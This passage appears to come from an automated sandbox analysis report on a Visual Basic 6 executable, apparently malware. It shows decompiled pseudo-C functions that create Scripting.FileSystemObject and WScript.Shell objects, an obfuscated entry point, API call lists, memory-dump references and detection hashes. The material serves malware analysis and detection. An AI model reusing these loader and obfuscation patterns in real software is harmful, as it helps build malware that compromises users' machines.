      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420480
      • #573.MSVBVM60(?,00000002), ref: 004204A2
      • __vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004204C6
      • #628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204CC
      • __vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204D6
      • __vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004204DE
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004204F1
      • __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420513
      • #564.MSVBVM60(00000004,?), ref: 004205E7
      • __vbaHresultCheck.MSVBVM60(00000000), ref: 00420601
      • __vbaI4Var.MSVBVM60(?), ref: 00420619
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 0042063A
      • __vbaOnError.MSVBVM60(000000FF), ref: 004206D0
      • __vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 004206E1
      • __vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 004206EB
      • #578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206F1
      • __vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004206FC
      • __vbaAryDestruct.MSVBVM60(00000000,?,00420748), ref: 0042073A
      • __vbaFreeStr.MSVBVM60(00000000,?,00420748), ref: 00420742
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
      • String ID: FOSTERET
      • API String ID: 53557705-1574993597
      • Opcode ID: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
      • Instruction ID: 175c832a1b51420b5258a5431e878aaed3d7726f1090ab63ff026ef9ecbe60f6
      • Opcode Fuzzy Hash: 74585fb6c561aa1d578bae654ca479468f3293eccefd2cf2175f35a5edf0b167
      • Instruction Fuzzy Hash: FED108B5910218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E66D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON
      Download Yara Rule
      C-Code - Quality: 46%
      			E0041E66D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v76;
				intOrPtr _v84;
				signed int _v108;
				char _v116;
				short _v120;
				char* _t30;
				char* _t33;
				short _t34;
				short _t35;
				intOrPtr _t56;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(0x68);
				L00401540();
				_v12 = _t56;
				_v8 = 0x401310;
				L004017B6();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52); // executed
				L004016F0(); // executed
				_t30 =  &_v52;
				_push(_t30);
				L004016F6();
				_push(_t30);
				_push( &_v28);
				L004016FC();
				L00401828();
				_v76 = L"Gulsoterne";
				_v84 = 8;
				_v108 = _v108 & 0x00000000;
				_v116 = 0x8002;
				_push(0x10);
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v28);
				_t33 =  &_v52;
				_push(_t33); // executed
				L004016EA(); // executed
				_push(_t33);
				_t34 =  &_v116;
				_push(_t34);
				L00401738();
				_v120 = _t34;
				L00401828();
				_t35 = _v120;
				if(_t35 != 0) {
					_push(0x9ae);
					L0040169C();
					L0040183A();
					_push(L"Propreste7");
					_push(L"Desorganisationens");
					L00401696();
					L0040183A();
				}
				_push(0x41e796);
				L00401846();
				L004017C2();
				L00401846();
				L00401846();
				return _t35;
			}




















      0x0041e672
      0x0041e67d
      0x0041e67e
      0x0041e685
      0x0041e688
      0x0041e690
      0x0041e693
      0x0041e6a0
      0x0041e6a5
      0x0041e6a7
      0x0041e6af
      0x0041e6b0
      0x0041e6b5
      0x0041e6b8
      0x0041e6b9
      0x0041e6be
      0x0041e6c2
      0x0041e6c3
      0x0041e6cb
      0x0041e6d0
      0x0041e6d7
      0x0041e6de
      0x0041e6e2
      0x0041e6e9
      0x0041e6ec
      0x0041e6f6
      0x0041e6f7
      0x0041e6f8
      0x0041e6f9
      0x0041e6fa
      0x0041e6fc
      0x0041e701
      0x0041e704
      0x0041e707
      0x0041e708
      0x0041e710
      0x0041e711
      0x0041e714
      0x0041e715
      0x0041e71a
      0x0041e721
      0x0041e726
      0x0041e72c
      0x0041e72e
      0x0041e733
      0x0041e73d
      0x0041e742
      0x0041e747
      0x0041e74c
      0x0041e756
      0x0041e756
      0x0041e75b
      0x0041e778
      0x0041e780
      0x0041e788
      0x0041e790
      0x0041e795

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E688
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E6A0
      • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B0
      • __vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6B9
      • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6C3
      • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E6CB
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E6EC
      • __vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E708
      • __vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E715
      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E721
      • #697.MSVBVM60(000009AE,?,00000000), ref: 0041E733
      • __vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E73D
      • __vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E74C
      • __vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E756
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E778
      • __vbaFreeObj.MSVBVM60(0041E796,?,00000000), ref: 0041E780
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E788
      • __vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E790
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
      • String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
      • API String ID: 3773181626-3836659718
      • Opcode ID: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
      • Instruction ID: 02a90346080b6d65794ca47e06d52b1e38554b1895dde0ef5aad230d2ce37d67
      • Opcode Fuzzy Hash: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
      • Instruction Fuzzy Hash: 24313C71910218A7DB10EBA2CD86FEE7778BF01708F60453EB101770E1EBBD56458B58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420F4C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON
      Download Yara Rule
      C-Code - Quality: 54%
      			E00420F4C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				char _v40;
				char _v44;
				char _v60;
				char* _t18;
				char* _t20;
				char* _t22;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0x18;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t32;
				_t18 = 0x2c;
				L00401540();
				_v28 = _t32;
				_v24 = 0x4014e0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_t22 =  &_v40;
				L004017B6();
				_v8 = 2;
				_push(_t22);
				_push(_t22);
				 *_t32 =  *0x401520;
				L004015D6();
				L004015DC();
				asm("fcomp qword [0x401518]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004016E4();
					_v8 = 4;
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v60); // executed
					L004016F0(); // executed
					_t20 =  &_v60;
					_push(_t20);
					L004016F6();
					_push(_t20);
					_t18 =  &_v44;
					_push(_t18);
					L004016FC();
					L00401828();
				}
				asm("wait");
				_push(0x421023);
				L00401846();
				L004017C2();
				return _t18;
			}
















      0x00420f4f
      0x00420f52
      0x00420f5d
      0x00420f5e
      0x00420f67
      0x00420f68
      0x00420f70
      0x00420f73
      0x00420f7a
      0x00420f81
      0x00420f88
      0x00420f92
      0x00420f95
      0x00420f9a
      0x00420fa7
      0x00420fa8
      0x00420fa9
      0x00420fac
      0x00420fb1
      0x00420fb6
      0x00420fbc
      0x00420fbe
      0x00420fbf
      0x00420fc1
      0x00420fc8
      0x00420fca
      0x00420fcf
      0x00420fd6
      0x00420fd8
      0x00420fe0
      0x00420fe1
      0x00420fe6
      0x00420fe9
      0x00420fea
      0x00420fef
      0x00420ff0
      0x00420ff3
      0x00420ff4
      0x00420ffc
      0x00420ffc
      0x00421001
      0x00421002
      0x00421015
      0x0042101d
      0x00421022

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420F68
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
      • #582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FAC
      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FB1
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420FCA
      • #716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FE1
      • __vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FEA
      • __vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FF4
      • __vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FFC
      • __vbaFreeStr.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 00421015
      • __vbaFreeObj.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 0042101D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$#582#716AddrefChkstkCopyError
      • String ID: WScript.Shell
      • API String ID: 2682307056-813827646
      • Opcode ID: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
      • Instruction ID: eb16c35e6acd40f0e13e5f4b480fa3bd2579fd0ca9ac4f3a52b02e3c4c7057dd
      • Opcode Fuzzy Hash: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
      • Instruction Fuzzy Hash: 06115EB1900208BBCB10EFA2DD46BDEBBB8EB04708F50456EF101771E1DB7D5A448B99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00421036, Relevance: 15.1, APIs: 10, Instructions: 102COMMON
      Download Yara Rule
      C-Code - Quality: 54%
      			E00421036(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401540();
				_v12 = _t76;
				_v8 = 0x401528;
				L004016FC();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x402314);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004016FC();
				L004015D0();
				_v28 = E00421317( &_v36);
				L004017C2();
				_v32 = E00421317(_v28) + 0x2b0;
				E004211B3(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x402314);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v88 = _t62;
				}
				_push(0x421179);
				L004017C2();
				return _t62;
			}






















      0x00421036
      0x00421047
      0x00421051
      0x00421059
      0x0042105c
      0x0042106a
      0x0042107b
      0x0042107e
      0x00421080
      0x00421087
      0x004210a0
      0x00421089
      0x00421089
      0x0042108b
      0x00421090
      0x00421093
      0x00421096
      0x0042109b
      0x0042109b
      0x004210a7
      0x004210b1
      0x004210ba
      0x004210c5
      0x004210cb
      0x004210dd
      0x004210e6
      0x004210eb
      0x004210f2
      0x004210f9
      0x00421100
      0x0042110a
      0x00421114
      0x00421115
      0x00421116
      0x00421117
      0x0042111b
      0x00421125
      0x00421126
      0x00421127
      0x00421128
      0x00421131
      0x00421137
      0x00421139
      0x00421140
      0x0042115c
      0x00421142
      0x00421142
      0x00421147
      0x0042114c
      0x0042114f
      0x00421152
      0x00421157
      0x00421157
      0x00421160
      0x00421173
      0x00421178

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00421051
      • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042106A
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,00000058), ref: 00421096
      • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004210B1
      • #644.MSVBVM60(?,?,?), ref: 004210BA
      • __vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004210CB
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042110A
      • __vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042111B
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,000002B0), ref: 00421152
      • __vbaFreeObj.MSVBVM60(00421179), ref: 00421173
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
      • String ID:
      • API String ID: 1032928638-0
      • Opcode ID: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
      • Instruction ID: cfd7f10f4326765af16ed6dd4e388d4e9dd2d1b1e363c786afdfca8b2c8dd650
      • Opcode Fuzzy Hash: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
      • Instruction Fuzzy Hash: EE414771900258AFDF01DF91CC46BDEBBB5FF09344F20442AFA01BB1A1D7B999468B98
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00401888, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142COMMON
      Download Yara Rule
      C-Code - Quality: 84%
      			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a1, void* _a4, void* _a12245915) {
				void* _v8;
				void* _v18;
				void* _v30;
				void* _v34;
				void* _v38;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v64;
				void* _v76;
				void* _v84;
				void* _v88;
				void* _v92;
				void* _v96;
				void* _v98;
				void* _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				void* _v166;
				void* _v168;
				void* _v176;
				void* _v184;
				void* _v192;
				void* _v200;
				void* _v206;
				void* _v216;
				void* _v222;
				void* _v224;
				void* _v230;
				void* _v232;
				void* _v238;
				void* _v240;
				void* _v248;
				void* _v264;
				void* _v272;
				void* _v280;
				void* _v294;
				void* _v302;
				void* _v332;
				void* _v336;
				void* _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				void* _v376;
				void* _v380;
				void* _v384;
				void* _v388;
				void* _v392;
				void* _v402;
				void* _v404;
				void* _v408;
				void* _v412;
				void* _v416;
				void* _v420;
				void* _v424;
				void* _v428;
				void* _v432;
				void* _v436;
				void* _v440;
				void* _v444;
				void* _v448;
				void* _v452;
				void* _v456;
				void* _v460;
				void* _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				void* _v480;
				void* _v484;
				void* _v488;
				void* _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				char _t794;

				_push("VB5!6&*"); // executed
				L00401882(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t794 = __eax + 1;
				 *_t794 =  *_t794 + _t794;
				 *_t794 =  *_t794 + _t794;
				 *_t794 =  *_t794 + _t794;
				 *0x88474d5d =  *0x88474d5d + __edx;
				asm("repne dec edx");
				 *0x6cc034c0 = _t794;
				do {
					asm("insb");
				} while (__eflags > 0);
				_push(cs);
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__esi = __esi - 1;
				__edx = __edx + 1;
				__edi = __edi - 1;
				__esp = __esp - 1;
				__esp = __esp + 1;
				__ebp =  &_a1;
				__esi = __esi - 1;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__esp = __esp - 1;
				 *__eax =  *__eax ^ __eax;
				 *((intOrPtr*)(__edx - 0x7bdfc270)) =  *((intOrPtr*)(__edx - 0x7bdfc270)) + __bh;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__eax = __ebp;
				 *__eax =  *__eax + __al;
				 *__ebx =  *__ebx + __dl;
				 *__eax =  *__eax + __al;
				 *__edi =  *__edi + __al;
				 *((intOrPtr*)(__edx + 0x79)) =  *((intOrPtr*)(__edx + 0x79)) + __ah;
				asm("a16 jb 0x7d");
				asm("outsb");
				 *0x41001001 =  *0x41001001 + __cl;
				__eflags =  *0x41001001;
				asm("o16 jae 0x6e");
				if( *0x41001001 >= 0) {
					L8:
					__al =  *0x74d8;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__ah = __ah + __cl;
					asm("sbb [eax], eax");
					_push(__esi);
					__edx = __edx + 1;
					__eax = __eax ^ 0x2a263621;
					__eflags = __eax;
					goto L9;
				} else {
					__ebp =  *(__ebx + 0x65 + __esi * 2) * 0x3772656e;
					 *__ecx =  *__ecx + __bl;
					 *__eax =  *__eax + __eax;
					__edx = __edx + 1;
					 *((intOrPtr*)(__eax + __edx)) =  *((intOrPtr*)(__eax + __edx)) + __ah;
					_t10 = __ecx + 0x66;
					 *_t10 =  *(__ecx + 0x66) + __al;
					__eflags =  *_t10;
					if(__eflags >= 0) {
						L9:
						__al = __al -  *[es:eax];
						__eflags = __al;
					} else {
						if(__eflags < 0) {
							__ebp =  *(__ebx + 0x65 + __esi * 2) * 0x3772656e;
							 *0x1567 =  *0x1567 + __dh;
							asm("rcl dword [esi], 0x0");
							 *__ecx =  *__ecx + __ah;
							_push(cs);
							 *__eax =  *__eax + __al;
							 *((intOrPtr*)(__eax + __eax + 0x46)) =  *((intOrPtr*)(__eax + __eax + 0x46)) + __al;
							__edi = __edi + __edi;
							__al = __al;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							 *((intOrPtr*)(__ecx + __esi + 0x10040)) =  *((intOrPtr*)(__ecx + __esi + 0x10040)) + __ah;
							__al = __al +  *__eax;
							asm("movsb");
							 *__eax =  *__eax & __eax;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							asm("invalid");
							asm("invalid");
							asm("invalid");
							asm("invalid");
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							__eax = es;
							__al = __al &  *__eax;
							asm("sbb al, 0x20");
							__edx = __edx + 1;
							 *__eax =  *__eax + __al;
							 *__eax =  *__eax + __al;
							_t23 = __eax + 0x74d8;
							 *_t23 =  *(__eax + 0x74d8) + __ah;
							__eflags =  *_t23;
							goto L8;
						}
					}
				}
				__al = __al -  *[es:eax];
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__eflags =  *__eax;
				if ( *__eax <= 0) goto L11;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__al = __al |  *__eax;
				__al = __al + 4;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__ah = 0x1c;
				__eax = __eax + 1;
				 *__eax =  *__eax + __al;
				asm("lock xor [ecx], al");
				__bh = __bh + __bh;
				asm("invalid");
				 *__eax =  *__eax | __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __al;
				__eflags =  *__eax;
				__al = __al +  *__eax;
				 *__eax =  *__eax + __al;
				goto 0x64401a19;
				asm("sbb al, [eax]");
				 *__ecx = ds;
				__eax = __eax + 1;
				 *((intOrPtr*)(__eax + __ebx + 0x780040)) =  *((intOrPtr*)(__eax + __ebx + 0x780040)) + __dl;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax;
				 *((intOrPtr*)(__ebx - 0x74000000)) =  *((intOrPtr*)(__ebx - 0x74000000)) + __cl;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				_t31 = __edi + 0x75;
				 *_t31 =  *(__edi + 0x75) + __ch;
				__eflags =  *_t31;
				goto L13;
				if (__eflags < 0) goto L24;
				if(__eflags == 0) {
					asm("outsb");
					asm("outsb");
					if (__eflags < 0) goto L18;
					_push(__ebp);
					__esi = __esi - 1;
					__edx = __edx + 1;
					__edi = __edi - 1;
					__esp = __esp - 1;
					__esp = __esp + 1;
					__ebp =  &_a1;
					__esi = __esi - 1;
					 *__eax =  *__eax + __al;
					_push( &_a1);
					__esi = __esi - 1;
					__edx = __edx + 1;
					__edi = __edi - 1;
					__esp = __esp - 1;
					__esp = __esp + 1;
					__ebp =  &_a1;
					__esi = __esi - 1;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					_push(__eax);
					 *__eax =  *__eax + __al;
					 *((intOrPtr*)(__edx - 0x7bdfc270)) =  *((intOrPtr*)(__edx - 0x7bdfc270)) + __bh;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__cl = 0;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					asm("fcomp dword [eax]");
					__eax = __eax + 1;
					_t35 = __eax + __eax;
					 *_t35 =  *(__eax + __eax);
					__eflags =  *_t35;
					do {
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + __dl;
						 *__eax =  *__eax + __al;
						__eflags =  *__eax;
					} while (__eflags < 0);
					__eax = __eax & 0xc455f3f4;
					__eflags = __eax;
					goto L23;
				}
				L24:
				asm("les eax, [esi-0x4b]");
				__al =  *0x1d768077;
				L23:
				asm("hlt");
				asm("repe push ebp");
				goto L24;
			}
































































































      0x00401888
      0x0040188d
      0x00401892
      0x00401894
      0x00401896
      0x00401898
      0x0040189a
      0x0040189c
      0x0040189d
      0x0040189f
      0x004018a1
      0x004018a3
      0x004018a9
      0x004018ac
      0x004018b0
      0x004018b0
      0x004018b0
      0x004018b3
      0x004018b4
      0x004018b6
      0x004018b8
      0x004018ba
      0x004018bc
      0x004018be
      0x004018c0
      0x004018c2
      0x004018c5
      0x004018c6
      0x004018c7
      0x004018c8
      0x004018c9
      0x004018ca
      0x004018cb
      0x004018cc
      0x004018ce
      0x004018d0
      0x004018d2
      0x004018d4
      0x004018d6
      0x004018d8
      0x004018da
      0x004018dc
      0x00401913
      0x00401915
      0x00401917
      0x00401919
      0x0040191b
      0x0040191d
      0x0040191f
      0x00401921
      0x00401923
      0x00401925
      0x00401927
      0x00401929
      0x0040192b
      0x0040192d
      0x0040192f
      0x00401931
      0x00401932
      0x00401934
      0x00401937
      0x00401939
      0x0040193b
      0x0040193e
      0x00401942
      0x00401943
      0x00401943
      0x00401949
      0x0040194c
      0x004019b8
      0x004019b8
      0x004019bd
      0x004019bf
      0x004019c1
      0x004019c3
      0x004019c5
      0x004019c7
      0x004019c9
      0x004019cc
      0x004019cd
      0x004019ce
      0x004019ce
      0x00000000
      0x00401950
      0x00401950
      0x00401958
      0x0040195a
      0x0040195c
      0x0040195d
      0x00401960
      0x00401960
      0x00401960
      0x00401963
      0x004019d0
      0x004019d0
      0x004019d0
      0x00401965
      0x00401965
      0x00401969
      0x00401971
      0x00401977
      0x0040197a
      0x0040197c
      0x0040197d
      0x00401982
      0x00401986
      0x00401988
      0x0040198a
      0x0040198d
      0x0040198f
      0x00401996
      0x00401998
      0x00401999
      0x0040199c
      0x0040199e
      0x004019a0
      0x004019a2
      0x004019a4
      0x004019a6
      0x004019a8
      0x004019aa
      0x004019ac
      0x004019ad
      0x004019b0
      0x004019b2
      0x004019b3
      0x004019b5
      0x004019b7
      0x004019b7
      0x004019b7
      0x00000000
      0x004019b7
      0x00401965
      0x00401963
      0x004019d1
      0x004019d4
      0x004019d6
      0x004019d8
      0x004019da
      0x004019dc
      0x004019de
      0x004019de
      0x004019e0
      0x004019e2
      0x004019e4
      0x004019e6
      0x004019e8
      0x004019ea
      0x004019ec
      0x004019ee
      0x004019f0
      0x004019f2
      0x004019f4
      0x004019f6
      0x004019f8
      0x004019fa
      0x004019fc
      0x004019fe
      0x004019ff
      0x00401a01
      0x00401a04
      0x00401a06
      0x00401a08
      0x00401a0a
      0x00401a0c
      0x00401a0e
      0x00401a0e
      0x00401a10
      0x00401a12
      0x00401a14
      0x00401a19
      0x00401a1c
      0x00401a1e
      0x00401a1f
      0x00401a26
      0x00401a28
      0x00401a2b
      0x00401a31
      0x00401a33
